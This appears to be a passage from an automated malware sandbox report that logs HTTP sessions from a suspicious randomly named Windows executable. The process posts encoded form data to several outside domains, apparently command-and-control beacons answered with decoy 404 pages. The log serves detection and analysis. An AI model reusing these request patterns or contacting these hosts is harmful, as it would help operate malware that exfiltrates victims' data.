                                                                                                        Data Ascii: DDp=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3snDhSyZQxZ8FXtgxAK31umKtsWW3aAhObs38Ofz4yGTiK05U/SEKt++WJBkhJsYo9txvmO9xEVj0evJexaPKDyoK5pnOthP2HgiTAIhDV8wFSJNs4lAXzhqAsYrgTMHdnagy5gNs27ApqIcuFMxphajEAa9TQHqD6StWs9hlAWQMkVIs4apXePqBw==
                                                                                                        Nov 6, 2024 08:41:24.278285027 CET302INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:24 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.650011154.23.184.218804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:25.877367020 CET1835OUTPOST /rqnz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.d63dm.top
                                                                                                        Referer: http://www.d63dm.top/rqnz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 76 44 67 67 4b 5a 66 32 31 38 45 58 74 67 76 77 4b 36 31 75 6d 58 74 73 2b 53 33 61 63 62 4f 5a 45 33 39 73 48 7a 76 7a 47 54 73 36 30 35 52 50 53 48 56 39 2b 52 57 49 78 67 68 4a 63 59 6f 39 74 78 76 6e 2b 39 2f 42 70 6a 32 65 76 4b 4f 68 61 39 62 54 7a 50 4b 36 59 63 4f 74 31 41 32 52 51 69 64 41 59 68 46 6d 55 77 49 53 4a 50 6c 6f 6b 54 58 7a 38 6f 41 73 56 46 67 51 52 73 64 6e 2b 67 7a 34 46 38 78 33 33 5a 77 72 4e 2b 76 55 70 54 77 31 43 4e 44 67 57 32 56 67 66 58 41 4a 53 56 56 5a 31 6c 71 6d 58 64 45 31 4a 48 71 39 6e 56 5a 76 36 36 52 6e 65 53 7a 65 38 4c 51 33 74 66 37 64 70 50 44 33 47 43 57 7a 72 52 76 65 4b 59 57 50 56 68 71 61 58 61 64 64 52 63 32 77 4a 54 4c 49 64 61 69 37 6e 42 51 49 77 67 34 73 30 6c 31 51 57 41 37 39 72 36 72 4f 37 34 59 62 36 52 58 33 6e 4d 32 4f 39 79 70 43 4d 4d 36 4e 38 6c 72 51 37 6b 42 35 63 67 36 70 66 78 65 61 56 59 31 46 [TRUNCATED]
                                                                                                        Data Ascii: DDp=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3svDggKZf218EXtgvwK61umXts+S3acbOZE39sHzvzGTs605RPSHV9+RWIxghJcYo9txvn+9/Bpj2evKOha9bTzPK6YcOt1A2RQidAYhFmUwISJPlokTXz8oAsVFgQRsdn+gz4F8x33ZwrN+vUpTw1CNDgW2VgfXAJSVVZ1lqmXdE1JHq9nVZv66RneSze8LQ3tf7dpPD3GCWzrRveKYWPVhqaXaddRc2wJTLIdai7nBQIwg4s0l1QWA79r6rO74Yb6RX3nM2O9ypCMM6N8lrQ7kB5cg6pfxeaVY1FXA3xWjyi2evuz1xo6IzCRhKFpwzCE4nQ2eS0lmJsroGZc09QfdM6c9u5PSaxDARRRSsrCF2l3oturkoq0vx2edjFJ/FVl8nhdhIICgI8PHSvCGZn+wYNCukr/G1PFxk4M+Y64MaB/JwtJylWqItpAiCWcU15NugJ+rp1rPZ8C8vtkCtSi8fE9UdempvTdXnh9G6heFwYr98flJdrPKxae9nAhibtSsIpm5/qDq1u+rK/gl0Nn9Ea8IHA8O4m1XrRowtTWjuihZCeQjMBzq/II5wGJ7+CAU6M0ivq9s88FtvQ10OkZ3ZbA+w3yXHVse9Z8iOdCSoRh0BKoR4/wuA32MpM72MWA5/s30jPK+aAN4F+lyF41BdVhHfEc+1r+f//WBz5aRbLionZJtOANljf/3aK8IBW9fZnGDPvMolT8ND1qWG6BP6ioHs+QMCf0+E/13XvT9lJxDB29Fj6+znzm7Gk1sQtmda8SJH7ZpuZ2yQOjdEcDrPq+U8kTofMCUBt3L+z0xUOHNmm+PH0zvAGJ/cikrD0U2mD5oqWw/LM/4ZIBoEZWElKjQVRJoeEFKxXfU5hTMgxP2QQo0W6H7x0WYu6I3FQad9va+oH9kjhQ0p9sHa2J4qmeLAidpxHqpACPdAv7afcgB5M3B0+flV28yl7GjFTeyN7a8 [TRUNCATED]
                                                                                                        Nov 6, 2024 08:41:26.817244053 CET302INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:26 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.650012154.23.184.218804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:28.450025082 CET546OUTGET /rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:41:29.382304907 CET302INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:29 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.65001331.31.196.17804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:34.704093933 CET813OUTPOST /h26k/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.servannto.site
                                                                                                        Referer: http://www.servannto.site/h26k/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4b 66 4a 4c 57 45 76 65 64 2b 44 72 46 65 77 37 58 44 7a 4d 56 4f 75 51 44 57 59 43 78 6b 47 70 6f 33 33 44 75 46 35 67 36 2b 58 35 64 73 45 42 46 69 52 42 45 35 2f 79 55 6f 52 4e 4c 4f 4e 66 76 35 78 68 44 6f 79 2f 44 59 65 6a 37 52 6f 35 51 59 61 65 4e 50 50 32 4b 59 4f 39 73 7a 53 6a 4e 78 77 66 6f 77 75 64 6c 32 47 4a 6a 32 38 7a 7a 46 4f 57 31 57 34 36 72 76 70 2b 43 65 35 55 71 30 6e 54 35 46 38 4f 36 69 4d 68 54 79 57 2f 2f 72 75 2b 74 59 4b 41 6b 6c 6c 51 62 62 55 7a 70 47 49 4a 4d 62 69 71 4c 46 41 48 53 5a 6a 46 43 66 56 67 37 70 73 77 54 62 55 6e 4e 52 4e 6c
                                                                                                        Data Ascii: DDp=6DLu6QMM1jamKfJLWEved+DrFew7XDzMVOuQDWYCxkGpo33DuF5g6+X5dsEBFiRBE5/yUoRNLONfv5xhDoy/DYej7Ro5QYaeNPP2KYO9szSjNxwfowudl2GJj28zzFOW1W46rvp+Ce5Uq0nT5F8O6iMhTyW//ru+tYKAkllQbbUzpGIJMbiqLFAHSZjFCfVg7pswTbUnNRNl
                                                                                                        Nov 6, 2024 08:41:35.580090046 CET375INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:35 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.65001431.31.196.17804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:37.249558926 CET837OUTPOST /h26k/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.servannto.site
                                                                                                        Referer: http://www.servannto.site/h26k/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 77 71 70 6f 57 48 44 68 68 74 67 2f 2b 58 35 56 4d 45 49 4c 43 52 4b 45 35 37 41 55 73 52 4e 4c 50 74 66 76 38 64 68 43 59 4f 38 44 49 65 68 77 78 6f 37 55 59 61 65 4e 50 50 32 4b 59 61 44 73 7a 61 6a 4d 46 4d 66 75 55 61 65 73 57 47 57 72 57 38 7a 33 46 4f 53 31 57 35 66 72 75 31 41 43 63 78 55 71 33 7a 54 67 77 49 4e 67 79 4e 6f 4d 43 58 2b 7a 35 37 50 6b 49 44 44 74 7a 39 48 41 72 77 4d 6c 51 56 54 51 6f 69 4a 5a 56 67 46 53 62 37 33 43 2f 56 4b 35 70 55 77 42 4d 59 41 43 6c 6f 47 6f 33 6c 57 76 61 52 42 42 49 56 35 4d 4a 64 47 67 73 6f 63 54 67 3d 3d
                                                                                                        Data Ascii: DDp=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxwqpoWHDhhtg/+X5VMEILCRKE57AUsRNLPtfv8dhCYO8DIehwxo7UYaeNPP2KYaDszajMFMfuUaesWGWrW8z3FOS1W5fru1ACcxUq3zTgwINgyNoMCX+z57PkIDDtz9HArwMlQVTQoiJZVgFSb73C/VK5pUwBMYACloGo3lWvaRBBIV5MJdGgsocTg==
                                                                                                        Nov 6, 2024 08:41:38.165126085 CET375INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.65001531.31.196.17804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:39.824002981 CET1850OUTPOST /h26k/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.servannto.site
                                                                                                        Referer: http://www.servannto.site/h26k/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 78 2b 70 6f 6b 50 44 75 6d 42 67 34 2b 58 35 62 73 45 4e 4c 43 52 74 45 39 66 45 55 73 56 33 4c 4b 70 66 75 65 56 68 4b 4b 71 38 4e 49 65 68 2f 52 6f 36 51 59 62 65 4e 50 2f 71 4b 59 4b 44 73 7a 61 6a 4d 45 63 66 75 41 75 65 71 57 47 4a 6a 32 39 38 7a 46 50 4e 31 57 78 6c 72 75 77 31 43 73 52 55 72 58 6a 54 69 69 67 4e 34 69 4e 71 50 43 57 74 7a 35 6e 55 6b 49 50 68 74 7a 68 74 41 6f 73 4d 6d 30 46 4e 46 6f 53 6d 62 7a 6b 5a 53 4c 6a 38 42 36 74 37 67 62 6f 71 45 2f 6f 43 63 6e 30 76 6e 77 35 68 69 4c 51 64 48 4c 59 4d 53 2b 35 58 6c 4e 34 57 52 56 46 4c 4e 56 39 39 7a 77 68 72 56 4f 71 77 33 59 71 37 33 46 33 64 6d 6e 79 7a 45 30 6e 76 73 78 31 7a 77 41 4d 4a 33 53 44 58 55 48 6e 65 4c 36 75 43 2b 48 46 52 62 38 4e 78 63 39 2b 5a 2f 44 64 51 6a 6e 7a 30 66 76 6f 64 4b 73 75 4c 74 36 70 38 74 74 54 70 63 76 51 39 31 54 51 49 36 4a 7a 45 2b 6b 52 72 50 4a 30 6b 69 6a [TRUNCATED]
                                                                                                        Data Ascii: DDp=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxx+pokPDumBg4+X5bsENLCRtE9fEUsV3LKpfueVhKKq8NIeh/Ro6QYbeNP/qKYKDszajMEcfuAueqWGJj298zFPN1Wxlruw1CsRUrXjTiigN4iNqPCWtz5nUkIPhtzhtAosMm0FNFoSmbzkZSLj8B6t7gboqE/oCcn0vnw5hiLQdHLYMS+5XlN4WRVFLNV99zwhrVOqw3Yq73F3dmnyzE0nvsx1zwAMJ3SDXUHneL6uC+HFRb8Nxc9+Z/DdQjnz0fvodKsuLt6p8ttTpcvQ91TQI6JzE+kRrPJ0kijC56OI8W5C4hc2QU8E9EORigMJ4fXdI32ViBU0mAhx1Mh/CHIxUfll4MG6wEv/s/ydzWW94hlin1zB1FIXUUecy1ReUrQJvzK4ZAH4ceYZ2HPzWz0yjSfZ59jB2owUGfDNzi4LxKEggeIwp9WLTxS7vuulj/9wjI9hpNtVSJ6Mr/adunIalxcIKFpDMQ5v+Pbv2wUf5ci0tyRKY2Klc4AyLieOqq8WHy1I8iqixhvCnoO1jASKO5H5LT9KwxvCYGNnf0wlbnLADX/NlMC3583us7BQBPlIQOpScAIjROMz2zHcX/H5EBxdAvjYUj462FEgew0p8aeiP+TSAD+rPWiagY1IQCVf1151Luwfs2OlyeL0nBa/jYeti8jJNQyfs/M00n+bcrbn5tSeXFBbgYTPPMCXFMHgqGYtOA1wfLmNjVtplpJCHdUfNSb59Vfhhyw8J6RhN57SYjZmX6z/w3mu3PpKxRtGvhVJukKrD4w2RhjIkf2WSRp2Yw0pU1BZV3l3QJIRXWeZOL2w4e/vVz3LhtRqqBhJc1/49HCHDGi70obTjOjb3MD59FpuGXMbKKz3C13YI3mVr2GQRrpd7Y0KEFI9Kc5UreO0NoQoQyccxp9qnjNeppH7Sh1F/YDUBda335oIxZ2RHt2pHRVXFdDlWB6Bj4n/k9STF [TRUNCATED]
                                                                                                        Nov 6, 2024 08:41:40.729546070 CET375INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:40 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.65001631.31.196.17804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:42.600986958 CET551OUTGET /h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:41:43.401824951 CET733INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:43 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.65001713.248.169.48804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:48.785178900 CET807OUTPOST /ykhz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.telforce.one
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.telforce.one
                                                                                                        Referer: http://www.telforce.one/ykhz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
